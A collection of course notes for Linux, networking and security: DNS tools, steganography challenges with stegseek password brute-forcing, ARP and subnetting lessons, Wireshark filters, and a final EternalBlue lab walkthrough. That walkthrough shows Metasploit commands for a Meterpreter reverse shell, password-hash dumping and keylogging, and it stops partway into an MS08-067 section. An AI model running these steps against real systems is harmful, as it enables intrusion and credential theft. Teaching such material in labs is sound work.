The `dig` (Domain Information Groper) command is more feature-rich than `nslookup`.
```bash
dig www.example.com
```
Example output:
```
; <<>> DiG 9.11.3-1ubuntu1.15-Ubuntu <<>> www.example.com
;; ANSWER SECTION:
www.example.com.    3600    IN    A    93.184.216.34
```
Key fields:
- **ANSWER SECTION**: Contains the resolved IP address (`93.184.216.34` in this example).
- **TTL (Time to Live)**: Indicates how long the result can be cached (`3600` seconds in this example).

#### **3. Check Local DNS Configuration**
To view or edit DNS settings, use `/etc/resolv.conf`:
```bash
cat /etc/resolv.conf
```
Example content:
```
nameserver 8.8.8.8
nameserver 8.8.4.4
```
This file lists the DNS servers used by the system (in this case, Google’s public DNS servers).

#### **4. Test DNS Resolution with `ping`**
```bash
ping www.example.com
```
This verifies both DNS resolution and network connectivity.

---

### **Troubleshooting DNS Issues**

1. **Check DNS Configuration**: Ensure `/etc/resolv.conf` points to a valid DNS server.
2. **Test with Alternate Servers**: Use public DNS servers like Google (`8.8.8.8`) or Cloudflare (`1.1.1.1`).
3. **Clear DNS Cache**:
   - For systems running `systemd-resolved`:
     ```bash
     sudo systemctl restart systemd-resolved
     ```
   - For other systems, manually restart the DNS resolver.
4. **Verify Network Connectivity**: Confirm that the system can reach the DNS server using `ping`.

---

### **Practical Use Cases**

- **Network Troubleshooting**: Resolve domain name issues with `nslookup` or `dig`.
- **Web Server Setup**: Verify DNS records for domains hosted on your server.
- **Custom DNS Configuration**: Modify `/etc/resolv.conf` to use faster or more secure DNS servers.
--------------------------------------------------------------------------------
/projects/steghide-task.md:
--------------------------------------------------------------------------------
# Challenge 1: The Secret Spy Message

A spy needs to send a secret message to their handler without raising suspicion. The message is hidden inside an innocent-looking image. Your goal is to extract the hidden message from the image.

## Task 1:
- Use `steghide` to extract the hidden message.
- If the password is unknown, attempt common password lists or brute force methods using the `stegseek` tool.

## Using a Wordlist Attack (Bruteforce with Stegseek)
Stegseek automates brute-forcing passwords against steghide-protected images.
## 1. Install Stegseek
Install Stegseek from this GitHub page: https://github.com/RickdeJager/stegseek

Link to the image: https://www.dropbox.com/scl/fi/1ovp3i2b44hp7qom58383/sample.zip?rlkey=4yfdu8tyr5sog792qpavrmeu2&st=ekm1enbr&dl=0
Unzip the file to get the image with hidden content.

## 2. Use a Wordlist to Crack the Password
```bash
time stegseek image.jpeg wordlist.txt
```

## 3. You should be able to find the hidden message and the contents.
Get the hidden content and submit your response on this form: https://docs.google.com/forms/d/e/1FAIpQLScPeTRSHloUYzJTJR_aJ6Nj69Y24u7UAcUgkkvsvWDREOw4Nw/viewform?usp=sharing

## Task 2:
- Download the file from Dropbox from the following link: https://www.dropbox.com/scl/fi/fkkch4ir2d08ft7ilz2cl/sample-2.txt?rlkey=17uceiu44g78jw5r6gb4608oj&st=7x7y0gd7&dl=0
- The file is a JPEG file encoded using a base64 encoder. Use the base64 decoder to extract the original picture.
- The image was converted to base64 using:
```bash
base64 secret_image.jpeg > secret_image.txt
```
- Converting the image back to JPEG:
```bash
base64 -d secret_image.txt > recovered.jpg
```
- Extract the hidden content and save the response to the form https://docs.google.com/forms/d/e/1FAIpQLScPeTRSHloUYzJTJR_aJ6Nj69Y24u7UAcUgkkvsvWDREOw4Nw/viewform?usp=sharing, and if the password is unknown, attempt common password lists or brute force methods using the `stegseek` tool.


# Challenge 2: Hidden QR Code (Advanced Image Steganography)

**Scenario:**
An underground hacking group shares sensitive information using images. The real message is hidden inside a **QR code** embedded within another image.

https://imagemagick.org/script/composite.php

Download the image from https://www.dropbox.com/scl/fi/6zcun8ujnmg2wgwxwi5o4/stego_image.png.tar.gz?rlkey=f2oeewzwrcct056e3cxs565yx&st=mg59w6z8&dl=0

## **1. Open the Image in Stegsolve**
Use **Stegsolve**, a Java-based tool for steganography analysis.

#### **Install Stegsolve (Java Required)**
1. Download Stegsolve from:
   **https://github.com/zardus/ctf-tools/blob/master/stegsolve/install**
2. Run it:
   ```bash
   java -jar stegsolve.jar
   ```

#### **Analyze the Image Using Color Planes**
1. **Open `stego_image.png`** in Stegsolve.
2. Click through the different **color planes** (Red, Green, Blue, Alpha).
3. **Look for patterns resembling a QR code**.

### **2. Extract & Scan the QR Code**
Once you identify the QR code:
1. **Take a screenshot** of the QR code.
2. Use **zbarimg** (Linux) or a QR scanner app to decode it.

#### **Extract with zbarimg (Linux)**
```bash
zbarimg extracted_qr.png
```
This will reveal the **hidden URL or message**.

--------------------------------------------------------------------------------
/week2/day1_networking.md:
--------------------------------------------------------------------------------
### **Networking in Linux**

Networking is an essential aspect of Linux, enabling systems to communicate, share resources, and interact seamlessly across various platforms, including Linux, Windows, and macOS. The flexibility and robustness of Linux networking make it a powerful tool for both small-scale and large-scale network configurations.

---

### **Key Features of Linux Networking**
1. **Versatility**: Supports a wide range of network protocols.
2. **Performance**: Known for its efficiency and capability to handle large-scale configurations.
3. **File-Based Configuration**: Stores network settings in configuration files, making them easy to edit and automate.
   - Examples:
     - **Debian/Ubuntu**: `/etc/network/interfaces`
     - **RHEL/CentOS**: `/etc/sysconfig/network-scripts/`

---

### **Popular Networking Commands**

1. **`ifconfig` (Interface Configuration)**
   - Displays or configures network interfaces.
   - **Usage**:
     ```bash
     ifconfig
     ```
   - Outputs details about active network interfaces (e.g., IP address, subnet mask, and MAC address).
   - **Note**: `ifconfig` is becoming obsolete and is being replaced by the `ip` command.

---

2. **`ip` Command** (Replacement for `ifconfig`)
   - More feature-rich and versatile than `ifconfig`.
   - **Examples**:
     - Display all network interfaces:
       ```bash
       ip addr
       ```
     - Bring an interface up or down:
       ```bash
       ip link set eth0 up
       ip link set eth0 down
       ```
     - Display the routing table:
       ```bash
       ip route show
       ```

---

3. **`ping` Command**
   - Tests the connectivity between two systems.
   - **Example**:
     ```bash
     ping google.com
     ```

---

4. **`netstat` / `ss` Commands**
   - Display network statistics and open connections.
   - **Examples**:
     ```bash
     netstat -tuln
     ss -tuln
     ```

---

5. **`traceroute`**
   - Traces the route packets take to reach a destination.
   - **Example**:
     ```bash
     traceroute google.com
     ```

---

6. **`curl` and `wget`**
   - Tools for transferring data over a network.
   - **Examples**:
     - Using `curl`:
       ```bash
       curl -I https://example.com
       ```
     - Using `wget`:
       ```bash
       wget https://example.com
       ```

---

### **Networking Configuration Files**
Linux stores network configurations in specific files depending on the distribution.
- **Debian/Ubuntu**: `/etc/network/interfaces`
- **RHEL/CentOS**: `/etc/sysconfig/network-scripts/`

These files define the network interfaces and their settings, such as IP addresses, gateway, DNS, etc.

---

### **Final Note**
Linux's networking tools and capabilities are extensive, allowing for flexible management of everything from simple home setups to complex enterprise networks. As the landscape evolves, transitioning from older commands like `ifconfig` to newer ones like `ip` ensures you stay ahead.
--------------------------------------------------------------------------------
/shell_week/shell.md:
--------------------------------------------------------------------------------
## **1. Create and Run Your First Bash Shell Script**
### **Steps:**
1. Create a script file:
   ```bash
   nano myscript.sh
   ```
2. Add the following content:
   ```bash
   #!/bin/bash
   echo "Hello, World!"
   ```
3. Make it executable:
   ```bash
   chmod +x myscript.sh
   ```
4. Run the script:
   ```bash
   ./myscript.sh
   ```
---

## **2. Understanding Variables in Bash Shell Scripting**
### **Types of Variables:**
- **User-defined variables**
  ```bash
  name="Kali"
  echo "Hello, $name"
  ```
- **Environment variables**
  ```bash
  echo "Current User: $USER"
  echo "Home Directory: $HOME"
  ```
- **Read-only variables**
  ```bash
  readonly myvar="This is constant"
  ```
---

## **3. Passing Arguments to Bash Scripts**
### **Example:**
```bash
#!/bin/bash
echo "Script name: $0"
echo "First argument: $1"
echo "Second argument: $2"
echo "All arguments: $@"
echo "Total arguments: $#"
```
### **Run the script:**
```bash
./myscript.sh Kali Linux
```

---

## **4. Using Arrays in Bash**
### **Example:**
```bash
#!/bin/bash
fruits=("Apple" "Banana" "Cherry")

# Print all elements
echo "All Fruits: ${fruits[@]}"

# Print specific element
echo "First Fruit: ${fruits[0]}"

# Add element
fruits+=("Mango")

# Length of array
echo "Total Fruits: ${#fruits[@]}"
```

---

## **5. Using Arithmetic Operators in Bash Scripting**
### **Example:**
```bash
#!/bin/bash
a=10
b=5

echo "Addition: $((a + b))"
echo "Subtraction: $((a - b))"
echo "Multiplication: $((a * b))"
echo "Division: $((a / b))"
echo "Modulus: $((a % b))"
```

---

## **6. String Operations in Bash**
### **Example:**
```bash
#!/bin/bash
str="Hello Kali"

# String Length
echo "Length: ${#str}"

# Substring (4 characters starting at offset 6)
echo "Substring: ${str:6:4}"

# Replace substring
echo "Replace: ${str/Kali/Linux}"
```

---

## **7. Decision Making With If Else and Case Statements**
### **If-Else Example:**
```bash
#!/bin/bash
num=10

if [ "$num" -gt 5 ]; then
  echo "Number is greater than 5"
else
  echo "Number is 5 or less"
fi
```
### **Case Statement Example:**
```bash
#!/bin/bash
read -p "Enter a fruit name: " fruit

case "$fruit" in
  "Apple") echo "You chose Apple." ;;
  "Banana") echo "You chose Banana." ;;
  "Cherry") echo "You chose Cherry." ;;
  *) echo "Unknown fruit!" ;;
esac
```

---

## **8. Loops in Bash**
### **For Loop:**
```bash
#!/bin/bash
for i in {1..5}; do
  echo "Iteration $i"
done
```
### **While Loop:**
```bash
#!/bin/bash
count=1

while [ "$count" -le 5 ]; do
  echo "Count: $count"
  ((count++))
done
```
### **Until Loop:**
```bash
#!/bin/bash
num=1

until [ "$num" -ge 5 ]; do
  echo "Number: $num"
  ((num++))
done
```
--------------------------------------------------------------------------------
/projects/steghide-guide.md:
--------------------------------------------------------------------------------
Here’s a **detailed step-by-step guide** on how to teach **Audio Steganography** using **DeepSound** and **Sonic Visualiser** in a practical, hands-on way.

---

## **Step 1: Understanding Audio Steganography**
### **1. Theory Explanation**
Before jumping into the practical, explain **how data can be hidden inside an audio file**:
- **Least Significant Bit (LSB) Encoding:** Modifies the least significant bits of audio samples to store secret data.
- **Phase Coding:** Hides data by altering the phase of an audio signal.
- **Spread Spectrum:** Spreads data across the audio file’s frequency spectrum.

### **2. Tools Overview**
- **DeepSound** (Windows) → Used to **hide and extract** data from audio files.
- **Sonic Visualiser** (Cross-platform) → Used to **analyze spectrograms** and detect hidden data.

---

## **Step 2: Practical Exercise – Hiding Data Using DeepSound**
### **1. Install DeepSound**
- **Windows:** Download DeepSound from [here](https://jpinsoft.net/deepsound/downloads.php).
- **Kali Linux:** Install Wine to run Windows apps:
  ```bash
  sudo apt install wine
  ```
  Then, download DeepSound and run:
  ```bash
  wine DeepSound.exe
  ```

### **2. Hide a Secret Message in an Audio File**
1. **Open DeepSound** and drag an MP3/WAV file into the main window.
2. Click **"Add Secret Files"** and select a text file (`secret.txt`).
   ```bash
   echo "The password is 1234" > secret.txt
   ```
3. Click **"Encode"**, set a password (e.g., `mystegosecret`), and save the new steganographic audio file.

---

## **Step 3: Extracting Hidden Data with DeepSound**
1. Open DeepSound and **load the modified audio file**.
2. Enter the correct password to **extract the hidden text file**.
3. Open the extracted `secret.txt` file:
   ```bash
   cat secret.txt
   ```

**Student Task:**
- Hide a message in an audio file and exchange files with a partner.
- Extract the hidden message from a partner’s file.

---

## **Step 4: Detecting Hidden Messages Using Sonic Visualiser**
### **1. Install Sonic Visualiser**
- **Linux (Kali/Ubuntu)**
  ```bash
  sudo apt install sonic-visualiser
  ```
- **Windows/Mac:** Download from [here](https://sonicvisualiser.org/).

### **2. Open the Steganographic Audio File**
1. Launch **Sonic Visualiser**.
2. Load the **modified audio file**.
3. Go to **Pane > Add Spectrogram** to analyze frequency changes.

### **3. Detecting Hidden Data**
- **Compare a normal audio file vs. the stego-audio file.**
- Look for **suspicious patterns** or **anomalies in the spectrogram**.

**Student Task:**
- Analyze different audio files and **try to detect which one contains hidden data**.
- Explain findings based on frequency changes or anomalies.
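The LSB encoding from Step 1 and the "normal file vs. stego file" comparison from Step 4, worked through in Python as an added example (this is not DeepSound's format and not code from the lesson). It assumes a constructed sawtooth cover with 8-bit precision stored in 16-bit words, and uses the chi-square "pairs of values" statistic, a standard LSB test the lesson does not name, as the detector.

```python
"""Added example: LSB audio steganography on constructed 16-bit PCM samples,
with the chi-square pairs-of-values check an analyst can run on a suspect
file. The cover is a constructed sawtooth whose low byte is zero (as 8-bit
audio upconverted to 16 bits would be); real recordings have noisier LSBs."""
import struct
from collections import Counter


def make_cover(n: int = 2048) -> list:
    """Constructed cover: 64-step sawtooth, 8-bit values shifted into 16 bits."""
    return [((i % 64) - 32) << 8 for i in range(n)]


def _bits(data: bytes):
    """Yield the bits of `data`, most significant bit of each byte first."""
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def lsb_embed(samples: list, payload: bytes) -> list:
    """Hide a 32-bit big-endian length header followed by `payload` in the
    least significant bit of successive samples (one bit per sample).
    Each sample moves by at most 1, which is inaudible at 16-bit depth."""
    message = struct.pack(">I", len(payload)) + payload
    if len(message) * 8 > len(samples):
        raise ValueError("payload too large for this carrier")
    stego = list(samples)
    for i, bit in enumerate(_bits(message)):
        stego[i] = (stego[i] & ~1) | bit   # clear the LSB, then write the bit
    return stego


def lsb_extract(samples: list) -> bytes:
    """Reverse of lsb_embed: read the length header, then that many bytes."""
    def byte_at(k: int) -> int:
        return sum((samples[k * 8 + j] & 1) << (7 - j) for j in range(8))
    (length,) = struct.unpack(">I", bytes(byte_at(k) for k in range(4)))
    if (4 + length) * 8 > len(samples):
        raise ValueError("length header exceeds carrier; not an LSB payload")
    return bytes(byte_at(k) for k in range(4, 4 + length))


def max_sample_change(cover: list, stego: list) -> int:
    """Largest per-sample difference between the two files."""
    return max(abs(a - b) for a, b in zip(cover, stego))


def chi_square_pov(samples: list) -> float:
    """Chi-square 'pairs of values' statistic, normalised per pair.
    LSB replacement pushes the counts of each value pair (2k, 2k+1) towards
    equality, so the statistic drops sharply on an LSB-stego file."""
    counts = Counter(samples)
    chi2, pairs = 0.0, 0
    for base in {v & ~1 for v in samples}:          # each even base value 2k
        even, odd = counts[base], counts[base + 1]
        expected = (even + odd) / 2
        if expected > 0:
            chi2 += (even - expected) ** 2 / expected
            pairs += 1
    return chi2 / pairs if pairs else 0.0


def looks_lsb_modified(reference: list, suspect: list) -> bool:
    """Step 4 comparison: flag the suspect file if its value pairs are far
    more equalised than the reference file's (here: below half its score)."""
    return chi_square_pov(suspect) < chi_square_pov(reference) / 2


if __name__ == "__main__":
    cover = make_cover()
    stego = lsb_embed(cover, b"The password is 1234")
    print("recovered:", lsb_extract(stego))
    print("max sample change:", max_sample_change(cover, stego))
    print("chi2 cover=%.2f stego=%.2f" % (chi_square_pov(cover), chi_square_pov(stego)))
    print("stego flagged:", looks_lsb_modified(cover, stego))
```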

---

## **Final Challenge**
- **Red Team (Hiders):** Hide secret messages inside different audio files.
- **Blue Team (Analysts):** Use **Sonic Visualiser** to detect steganographic files.
- **Scoring:**
  - Successful extraction = **+2 points**
  - Successful detection = **+1 point**

---

This will give students **both offensive (hiding data) and defensive (detection) skills** in steganography. Do you need a **custom CTF challenge** based on this lesson?
--------------------------------------------------------------------------------
/week2/day4_ethernet_arp.md:
--------------------------------------------------------------------------------
### **Ethernet, ARP, and RARP in Linux Networking**

Linux is a dominant operating system in the networking domain because of its reliability, open-source flexibility, and extensive protocol support. Among its essential networking concepts are **Ethernet**, **ARP (Address Resolution Protocol)**, and **RARP (Reverse Address Resolution Protocol)**. Here's a breakdown of these components and their significance:

---

### **1. Ethernet**
- **Definition**: Ethernet is the most commonly used technology for establishing Local Area Networks (LANs). It allows multiple devices to communicate within the same physical or logical network.
- **Role**: Ethernet is the foundation of LANs, enabling wired communication and providing a standard for data transmission.
- **Key Features**:
  - High-speed communication.
  - Reliable, standardized protocols (e.g., IEEE 802.3).
  - Compatible with various physical media (cables like Cat5/Cat6).

**Example in Linux**:
To view Ethernet network interfaces:
```bash
ip link show
```

---

### **2. ARP (Address Resolution Protocol)**
- **Definition**: ARP resolves IP addresses to MAC addresses. Since devices communicate over Ethernet using MAC addresses, ARP is critical for mapping an IP address (logical identifier) to its corresponding MAC address (hardware identifier).
- **How It Works**:
  1. A device sends an ARP request on the network, asking, “Who has this IP address?”
  2. The device with the matching IP replies with its MAC address.

**Example in Linux**:
- To display the ARP table (current IP-to-MAC mappings):
  ```bash
  arp -n
  ```
- To manually add an ARP entry:
  ```bash
  sudo arp -s 192.168.1.10 00:1A:2B:3C:4D:5E
  ```

---

### **3. RARP (Reverse Address Resolution Protocol)**
- **Definition**: RARP performs the reverse of ARP. It maps MAC addresses to IP addresses, helping devices determine their IP when only their MAC is known.
- **Usage**:
  - Often used during booting by diskless devices or workstations.
  - A RARP server assigns an IP address based on the device’s MAC address.

**Note**: While RARP is historically significant, it has been mostly replaced by modern protocols like **DHCP (Dynamic Host Configuration Protocol)**.

**Example**:
RARP is not commonly used directly in modern Linux systems, but tools like `tcpdump` can capture and analyze RARP packets:
```bash
sudo tcpdump -i eth0 ether proto 0x8035
```

---

### **Significance in Linux Networking**
- **Troubleshooting**: ARP tables help diagnose connectivity issues between devices.
- **Network Management**: Understanding Ethernet frames and address mappings is crucial for configuring firewalls, monitoring traffic, and ensuring efficient communication.
- **Legacy Systems**: While RARP is largely outdated, it provides insights into the evolution of networking protocols.
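The request/reply exchange described in the ARP section, built and decoded as raw Ethernet frames, plus the table check a defender runs on captured replies: an IP answered for by two different MACs is the sign of an ARP cache conflict. This is an added example, not code from the notes; all addresses are constructed sample values (the MAC `00:1a:2b:3c:4d:5e` is the one from the `arp -s` line above).

```python
"""Added example: build/parse ARP request and reply frames (Ethernet II +
28-byte IPv4 ARP body) and flag IPs claimed by more than one MAC.
All addresses are constructed sample values."""
import struct
from collections import defaultdict

ETH_P_ARP = 0x0806                      # EtherType for ARP
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = "ff:ff:ff:ff:ff:ff"
ZERO_MAC = "00:00:00:00:00:00"


def mac_bytes(mac: str) -> bytes:
    return bytes(int(part, 16) for part in mac.split(":"))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def ip_bytes(ip: str) -> bytes:
    return bytes(int(part) for part in ip.split("."))


def ip_str(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def build_arp(op: int, sender_mac: str, sender_ip: str,
              target_mac: str, target_ip: str) -> bytes:
    """Ethernet II header (14 bytes) followed by the ARP body (28 bytes).
    A request goes to the broadcast MAC with an all-zero target MAC: that is
    the on-wire form of "Who has this IP address?"; a reply is unicast back."""
    if op == ARP_REQUEST:
        dst_mac, target_mac = BROADCAST, ZERO_MAC
    else:
        dst_mac = target_mac
    eth = mac_bytes(dst_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)   # htype, ptype, hlen, plen, oper
           + mac_bytes(sender_mac) + ip_bytes(sender_ip)
           + mac_bytes(target_mac) + ip_bytes(target_ip))
    return eth + arp


def parse_arp(frame: bytes) -> dict:
    """Decode a frame from build_arp (or a captured IPv4-over-Ethernet ARP)."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("unsupported hardware/protocol type")
    return {
        "op": {ARP_REQUEST: "request", ARP_REPLY: "reply"}.get(op, "unknown"),
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": ip_str(frame[28:32]),
        "target_mac": mac_str(frame[32:38]),
        "target_ip": ip_str(frame[38:42]),
    }


def arp_conflicts(frames) -> dict:
    """Defender check: map each IP seen in ARP replies to the MACs that
    claimed it and return only the IPs claimed by more than one MAC."""
    claims = defaultdict(set)
    for frame in frames:
        info = parse_arp(frame)
        if info["op"] == "reply":
            claims[info["sender_ip"]].add(info["sender_mac"])
    return {ip: sorted(macs) for ip, macs in claims.items() if len(macs) > 1}


# Constructed exchange: host .20 asks who has .10, and .10 answers.
REQUEST = build_arp(ARP_REQUEST, "08:00:27:aa:bb:cc", "192.168.1.20",
                    ZERO_MAC, "192.168.1.10")
REPLY = build_arp(ARP_REPLY, "00:1a:2b:3c:4d:5e", "192.168.1.10",
                  "08:00:27:aa:bb:cc", "192.168.1.20")
# Constructed second reply for .10 from another MAC: the conflict to flag.
CONFLICTING_REPLY = build_arp(ARP_REPLY, "de:ad:be:ef:00:01", "192.168.1.10",
                              "08:00:27:aa:bb:cc", "192.168.1.20")

if __name__ == "__main__":
    for frame in (REQUEST, REPLY):
        print(parse_arp(frame))
    print("conflicts:", arp_conflicts([REQUEST, REPLY, CONFLICTING_REPLY]))
```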
61 | 62 | --- 63 | 64 | ### **Comparison of ARP and RARP** 65 | | **Feature** | **ARP** | **RARP** | 66 | |------------------|------------------------------|------------------------------| 67 | | **Function** | Maps IP to MAC addresses. | Maps MAC to IP addresses. | 68 | | **Direction** | Forward resolution. | Reverse resolution. | 69 | | **Modern Use** | Widely used. | Largely replaced by DHCP. | 70 | 71 | -------------------------------------------------------------------------------- /week2/day3_subnetting.md: -------------------------------------------------------------------------------- 1 | ### **Understanding Subnetting in Linux** 2 | 3 | **Subnetting** is a fundamental technique in networking that divides a larger network into smaller, manageable subnetworks (subnets). It helps in: 4 | - **Improving Performance**: Reduces network congestion by isolating traffic. 5 | - **Enhancing Security**: Restricts access between subnets. 6 | - **Efficient IP Address Management**: Prevents wastage of IP addresses in large networks. 7 | 8 | Linux systems often play a central role in managing subnets within an Internet Protocol (IP) addressing scheme, making subnetting essential in complex network setups. 9 | 10 | --- 11 | 12 | ### **Benefits of Subnetting** 13 | 1. **Efficient Use of IP Addresses**: Allows multiple subnets within a single IP address range. 14 | 2. **Reduced Broadcast Domains**: Isolates traffic to specific subnets, reducing unnecessary traffic. 15 | 3. **Enhanced Security**: Limits communication between subnets, improving data privacy. 16 | 17 | --- 18 | 19 | ### **Subnetting in Practice** 20 | 21 | 1. **IP Address and Subnet Mask** 22 | - An IP address (e.g., `192.168.1.1`) identifies a device. 23 | - A subnet mask (e.g., `255.255.255.0`) defines the size of the network and subnet. 
24 | 25 | Example: 26 | - **IP Address**: `192.168.1.1` 27 | - **Subnet Mask**: `255.255.255.0` 28 | - Total addresses in the subnet: 256 (from `192.168.1.0` to `192.168.1.255`). 29 | - Usable addresses: 254 (excluding `.0` and `.255` for network and broadcast). 30 | 31 | 2. **CIDR Notation** 32 | - Subnet masks are often written in CIDR (Classless Inter-Domain Routing) notation. 33 | - Example: `/24` = `255.255.255.0` (24 bits for the network, 8 bits for hosts). 34 | 35 | --- 36 | 37 | ### **Linux Commands for Subnetting** 38 | 39 | #### **1. Display the Current Routing Table** 40 | The `route` command shows routing rules and subnet information: 41 | ```bash 42 | route -n 43 | ``` 44 | - **Example Output**: 45 | ``` 46 | Kernel IP routing table 47 | Destination Gateway Genmask Flags Metric Ref Use Iface 48 | 0.0.0.0 192.168.1.1 0.0.0.0 UG 100 0 0 eth0 49 | 192.168.1.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0 50 | ``` 51 | 52 | #### **2. Add a New Subnet** 53 | Use the `route` command to add a route for a subnet: 54 | ```bash 55 | sudo route add -net 192.168.2.0/24 gw 192.168.1.1 56 | ``` 57 | - **Explanation**: 58 | - `192.168.2.0/24`: Subnet address and mask. 59 | - `192.168.1.1`: Gateway for the subnet. 60 | 61 | #### **3. Verify Network Interfaces and Subnet Configuration** 62 | ```bash 63 | ip addr 64 | ``` 65 | - Shows IP address and subnet mask for all interfaces. 66 | 67 | --- 68 | 69 | ### **Practical Example: Subnetting in Linux** 70 | Suppose you want to divide the network `192.168.1.0/24` into two subnets: 71 | - Subnet 1: `192.168.1.0/25` (128 addresses) 72 | - Subnet 2: `192.168.1.128/25` (128 addresses) 73 | 74 | 1. Configure Subnet 1: 75 | ```bash 76 | sudo route add -net 192.168.1.0/25 gw 192.168.1.1 77 | ``` 78 | 79 | 2. Configure Subnet 2: 80 | ```bash 81 | sudo route add -net 192.168.1.128/25 gw 192.168.1.1 82 | ``` 83 | 84 | 3. 
Verify: 85 | ```bash 86 | route -n 87 | ``` 88 | 89 | --- 90 | 91 | ### **Final Notes** 92 | - **Automation**: Use configuration files like `/etc/network/interfaces` (Debian/Ubuntu) or `/etc/sysconfig/network-scripts/` (RHEL/CentOS) for permanent routing rules. 93 | - **Replacement for `route`**: The `ip route` command is a modern alternative: 94 | ```bash 95 | ip route add 192.168.2.0/24 via 192.168.1.1 96 | ``` 97 | -------------------------------------------------------------------------------- /projects/new2_task.md: -------------------------------------------------------------------------------- 1 | ### **Explaining Wireshark Filters** 2 | In this step, you will learn how to use advanced display filters in Wireshark to perform more complex analysis tasks. 3 | Wireshark filters provide a powerful way to narrow down the traffic you want to inspect. Here’s a breakdown of the filters you've mentioned and their functionality: 4 | 5 | --- 6 | 7 | ### **1. Displaying HTTP GET Requests on TCP Port 80** 8 | 9 | **Filter:** 10 | ```bash 11 | tcp.port == 80 and http.request.method == GET 12 | ``` 13 | 14 | **Explanation:** 15 | - **`tcp.port == 80`**: This filter matches packets that are using TCP protocol and are directed to or from port 80. Port 80 is the default port for HTTP traffic. 16 | - **`http.request.method == GET`**: This filter looks for HTTP GET requests specifically. The HTTP GET method is used to request data from a specified resource, typically when you visit a website (like `www.example.com`). 17 | - **`and`**: This logical operator combines both conditions, meaning both must be true for the packet to match the filter. 18 | 19 | So, the combined filter shows all the **HTTP GET requests** that are using **TCP port 80**, typically indicating regular web browsing traffic where the client (browser) is requesting resources like HTML files, images, or scripts from a web server. 20 | 21 | --- 22 | 23 | ### **2. 
Displaying TCP Packets with a Length Between 1000 and 2000 Bytes** 24 | 25 | **Filter:** 26 | ```bash 27 | tcp.len >= 1000 and tcp.len <= 2000 28 | ``` 29 | 30 | **Explanation:** 31 | - **`tcp.len >= 1000`**: This part of the filter matches packets where the TCP payload (the data portion of the packet) is greater than or equal to 1000 bytes. 32 | - **`tcp.len <= 2000`**: This part of the filter matches packets where the TCP payload is less than or equal to 2000 bytes. 33 | - **`and`**: Again, the logical `and` operator means that both conditions must be true for the packet to match the filter. 34 | 35 | This filter is useful for inspecting **TCP packets with a specific size range**, such as large data transfers like file uploads, downloads, or other sizable communications, where the data portion of the packet falls between 1000 and 2000 bytes in length. 36 | 37 | --- 38 | 39 | ### **3. Displaying HTTP Traffic to/from Google** 40 | 41 | **Filter:** 42 | ```bash 43 | http.host contains "google.com" 44 | ``` 45 | 46 | **Explanation:** 47 | - **`http.host`**: This refers to the `Host` field in the HTTP request headers. The `Host` header specifies the domain name of the server (such as `google.com`) that the client wants to communicate with. 48 | - **`contains "google.com"`**: This part of the filter checks whether the `http.host` field contains the string `google.com`. This means it will capture any HTTP traffic where the request or response involves the Google domain (e.g., `www.google.com`, `mail.google.com`, etc.). 49 | 50 | This filter will show only the **HTTP traffic** involving **Google servers**. It's helpful when you want to isolate traffic to or from a particular website or service. 51 | 52 | --- 53 | 54 | ### **Combining Filters for Refined Analysis** 55 | 56 | By combining filters, you can tailor the data to your exact needs. 
For example, you can filter **only Google HTTP traffic** that also involves **GET requests** on **TCP port 80** by combining all three filters like this: 57 | 58 | ```bash 59 | tcp.port == 80 and http.request.method == GET and http.host contains "google.com" 60 | ``` 61 | 62 | This would show **HTTP GET requests** for **Google.com** specifically, on **port 80**, providing you with a very focused view of the traffic. 63 | 64 | --- 65 | 66 | ### **Conclusion** 67 | 68 | Wireshark's display filters are incredibly useful for narrowing down and focusing on specific network traffic. By combining protocol, port, size, and application-layer filters, you can efficiently analyze network behavior, troubleshoot problems, and detect anomalies or security issues. 69 | -------------------------------------------------------------------------------- /projects/post_exploitation_4.md: -------------------------------------------------------------------------------- 1 | 2 | 1. **How EternalBlue works** 3 | 2. **How to exploit it in a lab** 4 | 3. **How to approach the other ones step-by-step** 5 | 6 | 7 | 8 | ## **1️⃣ MS17-010 – EternalBlue SMBv1 RCE** 9 | 10 | **What it is:** 11 | 12 | * SMB (Server Message Block) is a file-sharing protocol in Windows. 13 | * In Windows 7 (and older systems), SMBv1 has a **buffer overflow vulnerability** that lets an attacker execute code remotely without authentication. 14 | * Microsoft patched it in March 2017 — but many unpatched systems still exist in labs. 15 | * Famously used in **WannaCry ransomware**. 16 | 17 | 18 | 19 | ### **Step-by-step Lab Example** 20 | 21 | **Requirements:** 22 | 23 | * Kali Linux attacker machine (Metasploit installed) 24 | * Windows 7 SP1 (32-bit or 64-bit) **unpatched** with SMBv1 enabled (Host-Only Network in VirtualBox/VMware) 25 | 26 | 27 | 28 | #### **1. 
Scan target with Nmap to check vulnerability** 29 | 30 | ```bash 31 | nmap -p 445 --script smb-vuln-ms17-010 32 | ``` 33 | 34 | * If it says **VULNERABLE**, you can proceed. 35 | 36 | 37 | 38 | #### **2. Start Metasploit** 39 | 40 | ```bash 41 | msfconsole 42 | ``` 43 | 44 | 45 | 46 | #### **3. Load the EternalBlue exploit** 47 | 48 | ```bash 49 | use exploit/windows/smb/ms17_010_eternalblue 50 | ``` 51 | 52 | 53 | #### **4. Set target IP** 54 | 55 | ```bash 56 | set RHOSTS 57 | ``` 58 | 59 | 60 | 61 | #### **5. Choose payload** 62 | 63 | ```bash 64 | set PAYLOAD windows/meterpreter/reverse_tcp 65 | set LHOST 66 | ``` 67 | 68 | 69 | 70 | #### **6. Exploit** 71 | 72 | ```bash 73 | exploit 74 | ``` 75 | 76 | * If successful, you’ll get a **Meterpreter session** (remote shell). 77 | 78 | 79 | 80 | #### **7. Post-exploitation fun** 81 | 82 | ```bash 83 | sysinfo # Get system info 84 | hashdump # Dump password hashes 85 | screenshot # Capture desktop screenshot 86 | keyscan_start # Start keylogger 87 | keyscan_dump # Dump logged keystrokes 88 | ``` 89 | 90 | 91 | ## **2️⃣ MS08-067 – NetAPI RCE** 92 | 93 | **How it 